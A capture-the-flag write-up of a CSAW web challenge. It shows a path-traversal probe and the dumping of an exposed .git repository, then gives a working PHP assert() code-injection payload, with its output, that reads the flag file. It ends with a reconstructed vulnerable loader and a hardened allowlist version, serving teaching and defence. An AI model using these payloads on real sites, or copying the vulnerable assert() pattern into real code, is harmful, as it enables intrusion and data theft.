Description:
Hey, I made my first website today. It’s pretty cool and web7.9.
http://web.chal.csaw.io:8000/
Entering the site, the first thing that comes to mind is an LFI attack: the site includes a page that is selected by a parameter in the URL.

The following table describes the possible response pages:

| URL | Result |
|---|---|
| http://web.chal.csaw.io:8000/?page=home | The "home" page is shown. |
| http://web.chal.csaw.io:8000/?page=about | The "about" page is shown. |
| http://web.chal.csaw.io:8000/?page=contact | The "contact" page is shown. |
| http://web.chal.csaw.io:8000/?page=Megabeets | Just a message saying: "That file doesn't exist!" |
| http://web.chal.csaw.io:8000/?page=flag | An empty page is shown inside the website. |
| http://web.chal.csaw.io:8000/?page=../../../../etc/passwd | Just a message saying: "Detected hacking attempt!" |
Looking at the page source, I saw the following comment:
<!--<li ><a href="?page=flag">My secrets</a></li> -->
OK, I need to get the "flag" page, but none of the LFI techniques I tried worked. I thought about something else: on the "about" page the creator of the site mentioned that it was built using git. So let's see if I am able to download the repository. The page http://web.chal.csaw.io:8000/.git/config exists, so I downloaded the repository using DVCS-RIPPER.
You can find index.php here.
So the page is using assert(), which evaluates a string argument as PHP code and is therefore vulnerable to a Command Injection attack when user input is embedded in that string. After a little trial and error I came up with the answer:
(Invoke-WebRequest "http://web.chal.csaw.io:8000/?page=Megabeets') || var_dump(file_get_contents('templates/flag.php'));// Comment").Content
And received the flag:
string(52) "<?php $FLAG="flag{3vald_@ss3rt_1s_best_a$$ert}"; ?> " Detected hacking attempt!
If you enter the URL in a browser instead, look at the page source (CTRL+U): the flag is inside a comment.
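As an added example (not the challenge's index.php, which this write-up links to but does not reproduce), here is the vulnerable shape that the payload above implies, beside a hardened loader. The payload closes a single quote and a parenthesis before appending `||`, so the original must interpolate the page name inside a quoted string that assert() evaluates; the exact checks in the assumed vulnerable function are my reconstruction, while the `templates/` directory and the page names come from the write-up.

```php
<?php
// Added example: an assumed reconstruction of the vulnerable pattern, not the challenge's own code.

// --- Vulnerable shape (assumed). ---
// A string passed to assert() is evaluated as PHP code, so the user-controlled $page
// becomes part of the code being run. Closing the quote and parenthesis in ?page=
// lets the rest of the parameter execute as PHP, which is what the payload above does.
function load_page_vulnerable(string $page): void
{
    $file = "templates/" . $page . ".php";
    // The "security check" itself is the injection point: $file is spliced into code.
    assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
    assert("file_exists('$file')") or die("That file doesn't exist!");
    include $file;
}

// --- Hardened loader. ---
// 1. The URL parameter only selects a key in a fixed allowlist; it never reaches
//    the file system or any eval-like function.
// 2. As defence in depth, the resolved path is checked to stay inside templates/.
// 3. assert() is not used for input validation at all: with zend.assertions=-1
//    (the usual production setting) assert() calls are not executed, so any check
//    placed in one silently disappears.
function load_page_hardened(string $page): ?string
{
    $pages = [
        'home'    => 'templates/home.php',
        'about'   => 'templates/about.php',
        'contact' => 'templates/contact.php',
    ];
    if (!array_key_exists($page, $pages)) {
        return null; // unknown page: no lookup, no error message that leaks paths
    }

    $base = realpath(__DIR__ . '/templates');
    $real = realpath(__DIR__ . '/' . $pages[$page]);
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // file missing or resolved outside the templates directory
    }
    return $real;
}

// Request handling with the hardened loader.
$page = $_GET['page'] ?? 'home';
$file = load_page_hardened($page);
if ($file === null) {
    http_response_code(404);
    echo "That file doesn't exist!";
} else {
    include $file;
}
```

With the allowlist in place, `?page=Megabeets')...`, `?page=../../../../etc/passwd` and `?page=flag` all take the same 404 branch, and the flag template is simply not reachable through the parameter. The second lesson from this challenge, the exposed `.git/` directory, is fixed outside the PHP code: deny access to `.git` at the web server or deploy only an exported tree rather than the working copy.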